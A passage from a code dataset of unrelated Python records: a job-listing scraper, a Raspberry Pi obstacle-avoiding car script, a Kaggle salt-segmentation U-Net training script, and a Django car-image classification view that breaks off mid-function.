requests.post(self.lurl, headers=self.headers, data=post_data).json()\r\n total = fjson['content']['positionResult']['totalCount']\r\n pn = math.ceil(total / 15)\r\n return pn\r\n\r\n def get_json(self):\r\n pn = self.get_pn()\r\n jsonlist = []\r\n for i in range(1, pn + 1):\r\n post_data = {\r\n \"first\": \"false\",\r\n \"pn\": str(i),\r\n \"kd\": self.jobname\r\n }\r\n ojson = requests.post(self.lurl, headers=self.headers, data=post_data).json()\r\n jsonlist.append(ojson)\r\n return jsonlist\r\n\r\n def get_info(self):\r\n jsonlist = self.get_json()\r\n job = {}\r\n job_id = []\r\n company = []\r\n salary = []\r\n district = []\r\n workyear = []\r\n education = []\r\n positionname = []\r\n positionAdvantage = []\r\n industryField = []\r\n createTime = []\r\n jobnature = []\r\n companySize = []\r\n companyLabelList = []\r\n financeStage = []\r\n for fjson in jsonlist:\r\n result = fjson['content']['positionResult']['result']\r\n for i in result:\r\n jobid = i['positionId']\r\n jcompany = i['companyShortName']\r\n jsalary = i['salary']\r\n jdistrict = i['district']\r\n jworkyear = i['workYear']\r\n jeducation = i['education']\r\n jpositionname = i['positionName']\r\n jpositionAdvantage = i['positionAdvantage']\r\n jjobnature = i['jobNature']\r\n jindustryField = i['industryField']\r\n jcreateTime = i['createTime']\r\n jcompanySize = i['companySize']\r\n jfinanceStage = i['financeStage']\r\n jcompanyLabelList = i['companyLabelList']\r\n company.append(jcompany)\r\n salary.append(jsalary)\r\n district.append(jdistrict)\r\n workyear.append(jworkyear)\r\n education.append(jeducation)\r\n positionname.append(jpositionname)\r\n positionAdvantage.append(jpositionAdvantage)\r\n industryField.append(jindustryField)\r\n createTime.append(jcreateTime)\r\n jobnature.append(jjobnature)\r\n companySize.append(jcompanySize)\r\n financeStage.append(jfinanceStage)\r\n companyLabelList.append(jcompanyLabelList)\r\n job_id.append(jobid)\r\n\r\n job['jobid'] = job_id\r\n job['公司'] = company\r\n job['薪资'] = salary\r\n job['地区'] = district\r\n job['城市'] = self.city\r\n job['工作年限'] = workyear\r\n job['教育经历'] = education\r\n job['职位'] = positionname\r\n job['职位诱惑'] = positionAdvantage\r\n job['工作方式'] = jobnature\r\n job['领域'] = industryField\r\n job['发布时间'] = createTime\r\n job['公司规模'] = companySize\r\n job['公司印象'] = companyLabelList\r\n job['公司状况'] = financeStage\r\n print('工作部分信息获取完毕')\r\n return job\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"lagou1/jobinfo.py","file_name":"jobinfo.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"539200038","text":"#########################################################################\n# 20171618 Dong_Seola 's code\n# this star_run.py file is Executable code\n#########################################################################\n\n# =======================================================================\n# define your variables and find out each value of variables\n# eg) dis and obstacle\n# =======================================================================\n\ndis = 17 #20\nobstacle = 0 # how many times does the car meet\n\n# Swing Turn 's angle\nSwingPr1 = 50\nSwingTr1 = 0.4\n# Point Turn 's angle\nSwingPr2 = 30\nSwingTr2 = 0.4\n# The speed that the executor wants\nspeed = 43\n\n# =======================================================================\n# import GPIO library and time module\n# =======================================================================\nimport RPi.GPIO as GPIO\nimport time\n\n# =======================================================================\n# set up GPIO mode as BOARD\n# set GPIO warnings as flase\n# =======================================================================\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\n# =======================================================================\n# import getDistance() method in the high-came\n# =======================================================================\nimport high_came\n\n#getDistance()\n\n# =======================================================================\n# import swing_point method\n# =======================================================================\nimport swing_point_turn\n\n#left_motor(x) #right_motor(x) - set right and left motor to move\n#rightSwingTurn(speed, runningtime) - rihgt wheel is stop\n#leftSwingTurn(speed, runningtime) - left wheel is stop\n#rightPointTurn(speed, runningtime) - right wheel go back\n#leftPointTurn(speed, runningtime) - left wheel go back\n\n# =======================================================================\n# import go_forward_any(), go_backward_any(), stop(), LeftPwm(),\n# RightPwm(), pwm_setup(), and pwm_low() methods in the module of go_any\n# =======================================================================\nimport for_back_ward\n\n#leftmotor(x) #rightmotor(x) - set right and left motor to move\n#go_forward_any(speed) - go forward while other stimulation\n#go_backward_any(speed) - go backward while other stimulation\n#go_forward(speed, running_time) - go forward while running time\n#go_backward(speed, running_time) - go backward while running time\n\n#pwm_setup() - get pwm 0 both wheel\n#pwm_low() - if there is unexpected occurrence\n#stop() - get pwm to stop\n\n# =======================================================================\n# setup and initilaize the left motor and right motor\n# =======================================================================\n\nfor_back_ward.pwm_setup()\n\n# ========================================================================\n# to perform the start_run with import\n# eg) go for,back ward and trun swing,point\n# ========================================================================\n\ntry:\n while True:\n # ultra sensor replies the distance back\n distance = high_came.getDistance()\n print('distance= ', distance)\n\n # when the distance is above the dis, moving object forwards\n if (distance > dis):\n if obstacle ==0 or 1:\n for_back_ward.go_forward_any(speed)\n print('obstacle=', obstacle)\n else :\n for_back_ward.go_forward(speed,2)\n\n # when the distance is below the dis\n else:\n # stop and wait 1 second\n for_back_ward.stop()\n time.sleep(1)\n #Swing right turn\n if obstacle==0:\n swing_point_turn.rightSwingTurn(SwingPr1,SwingTr1)\n time.sleep(1)\n obstacle +=1\n #Poin right trun\n elif obstacle==1:\n swing_point_turn.rightPointTurn(SwingPr2,SwingTr2)\n time.sleep(1)\n obstacle +=1\n\t\t\n\n\n# when the Ctrl+C key has been pressed,\n# the moving object will be stopped\nexcept KeyboardInterrupt:\n for_back_ward.pwm_low()\n","sub_path":"창업연계/3륜차 구동/원본/start_run_right.py","file_name":"start_run_right.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"440638752","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 12 08:00:54 2018\n\n@author: neha\n\n5 flold - same as model 11\n\"\"\"\n\n\nfrom sacred import Experiment\nfrom sacred.observers import MongoObserver\nfrom sacred.utils import apply_backspaces_and_linefeeds\n\nex = Experiment(\"TGsalt\", interactive=True)\nex.observers.append(MongoObserver.create(url='127.0.0.1:27017', db_name='kaggle_TGSalt'))\nex.captured_out_filter = apply_backspaces_and_linefeeds\n\n@ex.config\ndef my_config():\n epochs = 200\n batch_size = 32\n start_neurons_arg = 24\n dropout_arg = 0.05\n train_mask_threshold = 0.5\n lr_arg = 0.008\n exp_notes = \"Unet with resent and se blocks on folds. Similar to 2\"\n\n@ex.capture\ndef my_metrics(_run, logs):\n print(logs.get('val_my_iou_metric'))\n _run.log_scalar(\"loss\", float(logs.get('loss')))\n _run.log_scalar(\"acc\", float(logs.get('acc')))\n _run.log_scalar(\"val_loss\", float(logs.get('val_loss')))\n _run.log_scalar(\"val_acc\", float(logs.get('val_acc')))\n _run.log_scalar(\"my_iou_metric\", float(logs.get('my_iou_metric')))\n _run.log_scalar(\"val_my_iou_metric\", float(logs.get('val_my_iou_metric')))\n _run.result = float(logs.get('val_my_iou_metric'))\n\n@ex.automain\ndef my_main(batch_size, epochs, start_neurons_arg, dropout_arg, train_mask_threshold, lr_arg):\n import os\n import sys\n import random\n import pandas as pd\n import numpy as np\n import matplotlib.pyplot as plt\n plt.style.use('seaborn-white')\n import seaborn as sns\n sns.set_style(\"white\")\n from sklearn.model_selection import train_test_split\n from itertools import chain\n from skimage.io import imread, imshow, concatenate_images\n from skimage.transform import resize \n from keras.models import Model, load_model\n from keras.layers import Input,Dropout,BatchNormalization,Activation,Add,Multiply\n from keras.layers.core import Lambda, Dense\n from keras.layers.convolutional import Conv2D, Conv2DTranspose\n from keras.layers.pooling import MaxPooling2D, GlobalAveragePooling2D\n from keras.layers.merge import concatenate\n from keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, Callback, LearningRateScheduler\n from keras import backend as K\n from keras.optimizers import Adam, SGD\n import time \n import tensorflow as tf\n import h5py\n from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img #,save_img\n \n # Set some parameters\n im_width = 101\n im_height = 101\n im_chan = 1\n basicpath = '/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/'\n path_train = basicpath + 'train/'\n path_test = basicpath + 'test/'\n \n path_train_images = path_train + 'images/'\n path_train_masks = path_train + 'masks/'\n path_test_images = path_test + 'images/'\n \n img_size_ori = 101\n img_size_target = 101\n \n def upsample(img):# not used\n if img_size_ori == img_size_target:\n return img\n return resize(img, (img_size_target, img_size_target), mode='constant', preserve_range=True)\n #res = np.zeros((img_size_target, img_size_target), dtype=img.dtype)\n #res[:img_size_ori, :img_size_ori] = img\n #return res\n \n def downsample(img):# not used\n if img_size_ori == img_size_target:\n return img\n return resize(img, (img_size_ori, img_size_ori), mode='constant', preserve_range=True)\n #return img[:img_size_ori, :img_size_ori]\n \n # Loading of training/testing ids and depths\n def cov_to_class(val): \n for i in range(0, 11):\n if val * 10 <= i :\n return i\n \n def BatchActivate(x):\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n return x\n \n def convolution_block(x, filters, size, strides=(1,1), padding='same', activation=True):\n x = Conv2D(filters, size, strides=strides, padding=padding)(x)\n if activation==True: x = BatchActivate(x)\n return x\n \n def residual_block(blockInput, num_filters=16, batch_activate=False):\n x = BatchActivate(blockInput)\n x = convolution_block(x, num_filters, (3,3))\n x = convolution_block(x, num_filters, (3,3), activation=False)\n x = Add()([x, blockInput])\n if batch_activate: x = BatchActivate(x)\n return x\n \n def se_block(in_block, ch, ratio=16):\n x = GlobalAveragePooling2D()(in_block)\n x = Dense(ch//ratio, activation='relu')(x)\n x = Dense(ch, activation='sigmoid')(x)\n return Multiply()([in_block, x])\n # Build Model\n def build_model(input_layer, start_neurons, DropoutRatio=0.5):\n # 101 -> 50\n conv1 = Conv2D(start_neurons*1, (3,3), activation=None, padding='same')(input_layer)\n conv1 = residual_block(conv1, start_neurons*1)\n conv1 = se_block(conv1, start_neurons*1)\n conv1 = residual_block(conv1, start_neurons*1, True)\n conv1 = se_block(conv1, start_neurons*1)\n pool1 = MaxPooling2D((2,2))(conv1)\n pool1 = Dropout(DropoutRatio/2)(pool1)\n \n # 50 -> 25\n conv2 = Conv2D(start_neurons*2, (3,3), activation=None, padding='same')(pool1)\n conv2 = residual_block(conv2, start_neurons*2)\n conv2 = se_block(conv2, start_neurons*2)\n conv2 = residual_block(conv2, start_neurons*2, True)\n conv2 = se_block(conv2, start_neurons*2)\n pool2 = MaxPooling2D((2,2))(conv2)\n pool2 = Dropout(DropoutRatio)(pool2)\n \n # 25 -> 12\n conv3 = Conv2D(start_neurons*4, (3,3), activation=None, padding='same')(pool2)\n conv3 = residual_block(conv3, start_neurons*4)\n conv3 = se_block(conv3, start_neurons*4)\n conv3 = residual_block(conv3, start_neurons*4, True)\n conv3 = se_block(conv3, start_neurons*4)\n pool3 = MaxPooling2D((2,2))(conv3)\n pool3 = Dropout(DropoutRatio)(pool3)\n \n # 12 -> 6\n conv4 = Conv2D(start_neurons*8, (3,3), activation=None, padding='same')(pool3)\n conv4 = residual_block(conv4, start_neurons*8)\n conv4 = se_block(conv4, start_neurons*8)\n conv4 = residual_block(conv4, start_neurons*8, True)\n conv4 = se_block(conv4, start_neurons*8)\n pool4 = MaxPooling2D((2,2))(conv4)\n pool4 = Dropout(DropoutRatio)(pool4)\n \n # Middle\n convm = Conv2D(start_neurons*16, (3,3), activation=None, padding='same')(pool4)\n convm = residual_block(convm, start_neurons*16)\n convm = se_block(convm, start_neurons*16)\n convm = residual_block(convm, start_neurons*16, True)\n convm = se_block(convm, start_neurons*16)\n\n # 6 -> 12\n deconv4 = Conv2DTranspose(start_neurons*8, (3,3), strides=(2,2), padding='same')(convm)\n uconv4 = concatenate([deconv4, conv4])\n uconv4 = Dropout(DropoutRatio)(uconv4)\n \n uconv4 = Conv2D(start_neurons*8, (3,3), activation=None, padding='same')(uconv4)\n uconv4 = residual_block(uconv4, start_neurons*8)\n uconv4 = se_block(uconv4, start_neurons*8)\n uconv4 = residual_block(uconv4, start_neurons*8, True)\n uconv4 = se_block(uconv4, start_neurons*8)\n \n # 12 -> 25\n deconv3 = Conv2DTranspose(start_neurons*4, (3,3), strides=(2,2), padding='valid')(uconv4)\n uconv3 = concatenate([deconv3, conv3])\n uconv3 = Dropout(DropoutRatio)(uconv3)\n \n uconv3 = Conv2D(start_neurons*4, (3,3), activation=None, padding='same')(uconv3)\n uconv3 = residual_block(uconv3, start_neurons*4)\n uconv3 = se_block(uconv3, start_neurons*4)\n uconv3 = residual_block(uconv3, start_neurons*4, True)\n uconv3 = se_block(uconv3, start_neurons*4)\n \n # 25 -> 50\n deconv2 = Conv2DTranspose(start_neurons*2, (3,3), strides=(2,2), padding='same')(uconv3)\n uconv2 = concatenate([deconv2, conv2])\n uconv2 = Dropout(DropoutRatio)(uconv2)\n \n uconv2 = Conv2D(start_neurons*2, (3,3), activation=None, padding='same')(uconv2)\n uconv2 = residual_block(uconv2, start_neurons*2)\n uconv2 = se_block(uconv2, start_neurons*2)\n uconv2 = residual_block(uconv2, start_neurons*2, True)\n uconv2 = se_block(uconv2, start_neurons*2)\n \n # 50 -> 101\n deconv1 = Conv2DTranspose(start_neurons*1, (3,3), strides=(2,2), padding='valid')(uconv2)\n uconv1 = concatenate([deconv1, conv1])\n uconv1 = Dropout(DropoutRatio)(uconv1)\n \n uconv1 = Conv2D(start_neurons*1, (3,3), activation=None, padding='same')(uconv1)\n uconv1 = residual_block(uconv1, start_neurons*1)\n uconv1 = se_block(uconv1, start_neurons*1)\n uconv1 = residual_block(uconv1, start_neurons*1, True)\n uconv1 = se_block(uconv1, start_neurons*1)\n \n output_layer_noActi = Conv2D(1, (1,1), padding='same', activation=None)(uconv1)\n output_layer = Activation('sigmoid')(output_layer_noActi)\n \n return output_layer\n \n #Score the model and do a threshold optimization by the best IoU.\n \n # src: https://www.kaggle.com/aglotero/another-iou-metric\n def iou_metric(y_true_in, y_pred_in, print_table=False):\n labels = y_true_in\n y_pred = y_pred_in\n \n true_objects = 2\n pred_objects = 2\n \n # Jiaxin fin that if all zeros, then, the background is treated as object\n temp1 = np.histogram2d(labels.flatten(), y_pred.flatten(), bins=([0,0.5,1], [0,0.5, 1]))\n #temp1 = np.histogram2d(labels.flatten(), y_pred.flatten(), bins=(true_objects, pred_objects))\n #print(temp1)\n intersection = temp1[0]\n #print(\"temp2 = \",temp1[1])\n #print(intersection.shape)\n #print(intersection)\n #Compute areas (needed for finding the union between all objects)\n #print(np.histogram(labels, bins = true_objects))\n area_true = np.histogram(labels,bins=[0,0.5,1])[0]\n #print(\"area_true = \",area_true)\n area_pred = np.histogram(y_pred, bins=[0,0.5,1])[0]\n area_true = np.expand_dims(area_true, -1)\n area_pred = np.expand_dims(area_pred, 0)\n \n # Compute union\n union = area_true + area_pred - intersection\n \n # Exclude background from the analysis\n intersection = intersection[1:,1:]\n intersection[intersection == 0] = 1e-9\n \n union = union[1:,1:]\n union[union == 0] = 1e-9\n \n # Compute the intersection over union\n iou = intersection / union\n \n # Precision helper function\n def precision_at(threshold, iou):\n matches = iou > threshold\n true_positives = np.sum(matches, axis=1) == 1 # Correct objects\n false_positives = np.sum(matches, axis=0) == 0 # Missed objects\n false_negatives = np.sum(matches, axis=1) == 0 # Extra objects\n tp, fp, fn = np.sum(true_positives), np.sum(false_positives), np.sum(false_negatives)\n return tp, fp, fn\n \n # Loop over IoU thresholds\n prec = []\n if print_table:\n print(\"Thresh\\tTP\\tFP\\tFN\\tPrec.\")\n for t in np.arange(0.5, 1.0, 0.05):\n tp, fp, fn = precision_at(t, iou)\n if (tp + fp + fn) > 0:\n p = tp / (tp + fp + fn)\n else:\n p = 0\n if print_table:\n print(\"{:1.3f}\\t{}\\t{}\\t{}\\t{:1.3f}\".format(t, tp, fp, fn, p))\n prec.append(p)\n \n if print_table:\n print(\"AP\\t-\\t-\\t-\\t{:1.3f}\".format(np.mean(prec)))\n return np.mean(prec)\n \n def iou_metric_batch(y_true_in, y_pred_in):\n batch_size = y_true_in.shape[0]\n metric = []\n for batch in range(batch_size):\n value = iou_metric(y_true_in[batch], y_pred_in[batch])\n metric.append(value)\n return np.mean(metric)\n \n def my_iou_metric(label, pred):\n metric_value = tf.py_func(iou_metric_batch, [label, pred> train_mask_threshold], tf.float64)\n return metric_value\n \n def iou_metric_batch_2(y_true_in, y_pred_in):\n ## Scoring for last model, choose threshold by validation data \n thresholds_ori = np.linspace(0.3, 0.7, 31)\n # Reverse sigmoid function: Use code below because the sigmoid activation was removed\n thresholds = np.log(thresholds_ori/(1-thresholds_ori)) \n ious = np.array([iou_metric_batch(y_true_in, y_pred_in > threshold) for threshold in thresholds])\n return ious.max()\n \n def my_iou_metric_2(label, pred):\n return tf.py_func(iou_metric_batch_2, [label, pred], tf.float64)\n \n class LogMetrics(Callback):\n def on_epoch_end(self, _, logs={}):\n my_metrics(logs=logs)\n \n def jaccard_distance_loss(y_true, y_pred):\n \"\"\"\n Jaccard = (|X & Y|)/ (|X|+ |Y| - |X & Y|)\n = sum(|A*B|)/(sum(|A|)+sum(|B|)-sum(|A*B|))\n \n The jaccard distance loss is usefull for unbalanced datasets. This has been\n shifted so it converges on 0 and is smoothed to avoid exploding or disapearing\n gradient.\n \n Ref: https://en.wikipedia.org/wiki/Jaccard_index\n \n @url: https://gist.github.com/wassname/f1452b748efcbeb4cb9b1d059dce6f96\n @author: wassname\n \"\"\"\n smooth=100\n intersection = K.sum(K.abs(y_true * y_pred), axis=-1)\n sum_ = K.sum(K.abs(y_true) + K.abs(y_pred), axis=-1)\n jac = (intersection + smooth) / (sum_ - intersection + smooth)\n return (1 - jac) * smooth\n \n\n # code download from: https://github.com/bermanmaxim/LovaszSoftmax\n def lovasz_grad(gt_sorted):\n \"\"\"\n Computes gradient of the Lovasz extension w.r.t sorted errors\n See Alg. 1 in paper\n \"\"\"\n gts = tf.reduce_sum(gt_sorted)\n intersection = gts - tf.cumsum(gt_sorted)\n union = gts + tf.cumsum(1. - gt_sorted)\n jaccard = 1. - intersection / union\n jaccard = tf.concat((jaccard[0:1], jaccard[1:] - jaccard[:-1]), 0)\n return jaccard\n \n # --------------------------- BINARY LOSSES ---------------------------\n \n def lovasz_hinge(logits, labels, per_image=True, ignore=None):\n \"\"\"\n Binary Lovasz hinge loss\n logits: [B, H, W] Variable, logits at each pixel (between -\\infty and +\\infty)\n labels: [B, H, W] Tensor, binary ground truth masks (0 or 1)\n per_image: compute the loss per image instead of per batch\n ignore: void class id\n \"\"\"\n if per_image:\n def treat_image(log_lab):\n log, lab = log_lab\n log, lab = tf.expand_dims(log, 0), tf.expand_dims(lab, 0)\n log, lab = flatten_binary_scores(log, lab, ignore)\n return lovasz_hinge_flat(log, lab)\n losses = tf.map_fn(treat_image, (logits, labels), dtype=tf.float32)\n loss = tf.reduce_mean(losses)\n else:\n loss = lovasz_hinge_flat(*flatten_binary_scores(logits, labels, ignore))\n return loss\n \n def lovasz_hinge_flat(logits, labels):\n \"\"\"\n Binary Lovasz hinge loss\n logits: [P] Variable, logits at each prediction (between -\\infty and +\\infty)\n labels: [P] Tensor, binary ground truth labels (0 or 1)\n ignore: label to ignore\n \"\"\"\n \n def compute_loss():\n labelsf = tf.cast(labels, logits.dtype)\n signs = 2. * labelsf - 1.\n errors = 1. - logits * tf.stop_gradient(signs)\n errors_sorted, perm = tf.nn.top_k(errors, k=tf.shape(errors)[0], name=\"descending_sort\")\n gt_sorted = tf.gather(labelsf, perm)\n grad = lovasz_grad(gt_sorted)\n loss = tf.tensordot(tf.nn.elu(errors_sorted), tf.stop_gradient(grad), 1, name=\"loss_non_void\")\n return loss\n \n # deal with the void prediction case (only void pixels)\n loss = tf.cond(tf.equal(tf.shape(logits)[0], 0),\n lambda: tf.reduce_sum(logits) * 0.,\n compute_loss,\n strict=True,\n name=\"loss\"\n )\n return loss\n \n \n def flatten_binary_scores(scores, labels, ignore=None):\n \"\"\"\n Flattens predictions in the batch (binary case)\n Remove labels equal to 'ignore'\n \"\"\"\n scores = tf.reshape(scores, (-1,))\n labels = tf.reshape(labels, (-1,))\n if ignore is None:\n return scores, labels\n valid = tf.not_equal(labels, ignore)\n vscores = tf.boolean_mask(scores, valid, name='valid_scores')\n vlabels = tf.boolean_mask(labels, valid, name='valid_labels')\n return vscores, vlabels\n \n def lovasz_loss(y_true, y_pred):\n y_true, y_pred = K.cast(K.squeeze(y_true, -1), 'int32'), K.cast(K.squeeze(y_pred, -1), 'float32')\n #logits = K.log(y_pred / (1. - y_pred))\n logits = y_pred #Jiaxin\n loss = lovasz_hinge(logits, y_true, per_image = True, ignore = None)\n return loss\n\n train_df = pd.read_csv(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/train.csv\", index_col=\"id\", usecols=[0])\n depths_df = pd.read_csv(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/depths.csv\", index_col=\"id\")\n train_df = train_df.join(depths_df) \n len(train_df)\n \n train_df[\"images\"] = [np.array(load_img(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/train/images/{}.png\".format(idx), grayscale=True)) / 255 for idx in train_df.index]\n train_df[\"masks\"] = [np.array(load_img(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/train/masks/{}.png\".format(idx), grayscale=True)) / 255 for idx in train_df.index]\n train_df[\"coverage\"] = train_df.masks.map(np.sum) / pow(img_size_ori, 2)\n \n train_df[\"coverage_class\"] = train_df.coverage.map(cov_to_class)\n \n # trainng for one fold\n fold = 0\n t_fold = pd.Series.from_csv(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/train_fold_\"+str(fold)+\".csv\")\n v_fold = pd.Series.from_csv(\"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/data/valid_fold_\"+str(fold)+\".csv\")\n\n #Data augmentation\n x_train = np.array(train_df[train_df.index.isin(t_fold.values)].images.map(upsample).tolist()).reshape(-1, img_size_target, img_size_target, 1)\n y_train = np.array(train_df[train_df.index.isin(t_fold.values)].masks.map(upsample).tolist()).reshape(-1, img_size_target, img_size_target, 1)\n x_valid = np.array(train_df[train_df.index.isin(v_fold.values)].images.map(upsample).tolist()).reshape(-1, img_size_target, img_size_target, 1)\n y_valid = np.array(train_df[train_df.index.isin(v_fold.values)].masks.map(upsample).tolist()).reshape(-1, img_size_target, img_size_target, 1)\n\n #Data augmentation\n x_train2 = np.concatenate((x_train, [np.fliplr(x) for x in x_train]), axis=0)\n y_train2 = np.concatenate((y_train, [np.fliplr(x) for x in y_train]), axis=0)\n print(x_train2.shape)\n print(y_valid.shape)\n \n\n # model\n input_layer = Input((img_size_target, img_size_target, 1))\n output_layer = build_model(input_layer, start_neurons_arg, dropout_arg)\n \n model = Model(input_layer, output_layer)\n \n #c = Adam(lr = lr_arg)\n c = SGD(lr=lr_arg, momentum=0.9, decay=0.0001, nesterov=False)\n\n model.compile(loss=\"binary_crossentropy\", optimizer=c, metrics=[my_iou_metric, 'accuracy'])\n \n model.summary()\n save_model_name = \"unet_resent_12_fold\"+str(fold)+\".model\" \n early_stopping = EarlyStopping(monitor='val_my_iou_metric', mode = 'max',patience=15, verbose=1)\n model_checkpoint = ModelCheckpoint(save_model_name, monitor='val_my_iou_metric', mode='max',\n save_best_only=True, verbose=1)\n \n reduce_lr = ReduceLROnPlateau(monitor='val_my_iou_metric', mode='max', factor=0.5, patience=5,\n min_lr=0.000001, verbose=1)\n \n t_model1_start = time.time()\n model.fit(x_train2, y_train2,\n validation_data=[x_valid, y_valid], \n epochs=epochs,\n batch_size=batch_size,\n callbacks=[early_stopping, model_checkpoint, reduce_lr, LogMetrics()], \n verbose=2)\n t_model1_end = time.time()\n print(f\"Run time = {(t_model1_end-t_model1_start)/3600} hours\")\n\n \"\"\"\n save_model_name = \"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/models/unet_resent_12_fold\"+str(fold)+\".model\"\n \n # retrain using other loss\n model = load_model(save_model_name, custom_objects={'my_iou_metric':my_iou_metric, 'jaccard_distance_loss': jaccard_distance_loss})\n # remove activation layer and use lovasz loss\n input_x = model.layers[0].input\n \n output_layer = model.layers[-1].input\n model = Model(input_x, output_layer)\n c = Adam(lr=0.01)\n \n model.compile(loss=lovasz_loss, optimizer=c, metrics=[my_iou_metric_2, 'accuracy', my_iou_metric])\n \n model.summary()\n save_model_name = \"/home/neha/Desktop/code/ML/Kaggle/TGSsalt/models/unet_resent_12_hl_fold\"+str(fold)+\".model\" \n\n early_stopping = EarlyStopping(monitor='val_my_iou_metric_2', mode = 'max',patience=30, verbose=1)\n model_checkpoint = ModelCheckpoint(save_model_name,monitor='val_my_iou_metric_2', \n mode = 'max', save_best_only=True, verbose=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_my_iou_metric_2', mode = 'max',factor=0.5, patience=5, \n min_lr=0.00005, verbose=1)\n epochs = 120\n batch_size = 128\n \n t_model2_start = time.time()\n history = model.fit(x_train, y_train,\n validation_data=[x_valid, y_valid], \n epochs=epochs,\n batch_size=batch_size,\n callbacks=[ model_checkpoint,reduce_lr,early_stopping, LogMetrics()], \n verbose=2)\n t_model2_end = time.time()\n print(f\"Run time = {(t_model2_end-t_model2_start)/3600} hours\")\n \"\"\"","sub_path":"TGSsalt/models/model_12.py","file_name":"model_12.py","file_ext":"py","file_size_in_byte":22088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"493120854","text":"from django.shortcuts import render, redirect\nfrom .forms import ImageForm\nfrom .models import Image\nfrom bs4 import BeautifulSoup\nimport requests\n\n\nimport numpy as np\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\n\n\n# Create your views here.\n\ndef index(request):\n if request.method == 'POST':\n form = ImageForm(request.POST, request.FILES)\n\n images = Image.objects.all()\n if len(images) == 1:\n delete_image = Image.objects.all()\n delete_image.delete()\n \n image = form.save(commit=False)\n image.save()\n images = Image.objects.all()\n image_path = images[0].image\n top_3, percent= run_inference_on_image(str(image_path))\n\n car_name_list, car_type_list, car_producer_list, car_image_list, car_detail_list = car_crawling(top_3)\n \n form = ImageForm()\n context = {\n 'images':images,\n 'percent':percent,\n 'form':form,\n 'car_1_name':car_name_list[0],\n 'car_1_type':car_type_list[0],\n 'car_1_producer':car_producer_list[0],\n 'car_1_image':car_image_list[0],\n 'car_1_detail':car_detail_list[0],\n 'car_2_name':car_name_list[1],\n 'car_2_type':car_type_list[1],\n 'car_2_producer':car_producer_list[1],\n 'car_2_image':car_image_list[1],\n 'car_2_detail':car_detail_list[1],\n 'car_3_name':car_name_list[2],\n 'car_3_type':car_type_list[2],\n 'car_3_producer':car_producer_list[2],\n 'car_3_image':car_image_list[2],\n 'car_3_detail':car_detail_list[2],\n }\n\n return render(request, 'result.html',context)\n else:\n if form.is_valid():\n image = form.save(commit=False)\n image.save()\n images = Image.objects.all()\n image_path = images[0].image\n top_3, percent= run_inference_on_image(str(image_path))\n car_name_list, car_type_list, car_producer_list, car_image_list, car_detail_list = car_crawling(top_3)\n \n form = ImageForm()\n context = {\n 'images':images,\n 'percent':percent,\n 'form':form,\n 'car_1_name':car_name_list[0],\n 'car_1_type':car_type_list[0],\n 'car_1_producer':car_producer_list[0],\n 'car_1_image':car_image_list[0],\n 'car_1_detail':car_detail_list[0],\n 'car_2_name':car_name_list[1],\n 'car_2_type':car_type_list[1],\n 'car_2_producer':car_producer_list[1],\n 'car_2_image':car_image_list[1],\n 'car_2_detail':car_detail_list[1],\n 'car_3_name':car_name_list[2],\n 'car_3_type':car_type_list[2],\n 'car_3_producer':car_producer_list[2],\n 'car_3_image':car_image_list[2],\n 'car_3_detail':car_detail_list[2],\n }\n\n return render(request, 'result.html',context)\n else:\n delete_image=Image.objects.all()\n delete_image.delete()\n form = ImageForm()\n context = {\n 'form':form\n }\n return render(request, 'index.html', context)\n\ndef result(request):\n return render(request, 'result.html')\n\ndef run_inference_on_image(image_path):\n # 추론을 진행할 이미지 파일경로\n # image_path = './kia3.jpg'\n # image_path = './model_360.png'\n\n # 읽어들일 labels 파일 경로\n labels_txt_file_path = './output_labels.txt'\n answer = None\n\n # 만약 경로에 이미지 파일이 없을 경우 오류 로그를 출력합니다.\n if not tf.gfile.Exists(image_path):\n tf.logging.fatal('추론할 이미지 파일이 존재하지 않습니다. %s', image_path)\n return answer\n\n # 이미지 파일을 읽습니다.\n image_data = tf.gfile.FastGFile(image_path, 'rb').read()\n # 그래프를 생성합니다.\n graph_pb_file_path = './output_graph.pb'\n with tf.gfile.FastGFile(graph_pb_file_path, 'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n _ = tf.import_graph_def(graph_def, name='')\n # 세션을 열고 그래프를 실행합니다.\n with tf.Session() as sess:\n # 최종 소프트 맥스 출력 레이어를 지정합니다.\n softmax_tensor = sess.graph.get_tensor_by_name('final_result:0')\n # 추론할 이미지를 인풋으로 넣고 추론 결과인 소프트 맥스 행렬을 리턴 받습니다.\n predictions = sess.run(softmax_tensor, feed_dict={\n 'DecodeJpeg/contents:0': image_data})\n # 불필요한 차원을 제거합니다.\n predictions = np.squeeze(predictions)\n # 가장 높은 확률을 가진 5개(top 5)의 예측값(predictions)들의 인덱스를 가져옵니다.\n # e.g. [0 3 2 4 1]]\n top_k = predictions.argsort()[-5:][::-1]\n\n # output_labels.txt 파일로부터 정답 레이블들을 list 형태로 가져옵니다.\n f = open(labels_txt_file_path, 'r', encoding='utf-8')\n lines = f.readlines()\n labels = [str(w).replace(\"\\n\", \"\") for w in lines]\n\n # 가장 높은 확률을 가진 인덱스들부터 추론 결과(Top-10)를 출력합니다.\n top_3 = []\n percent = []\n\n idx = 0\n for node_id in 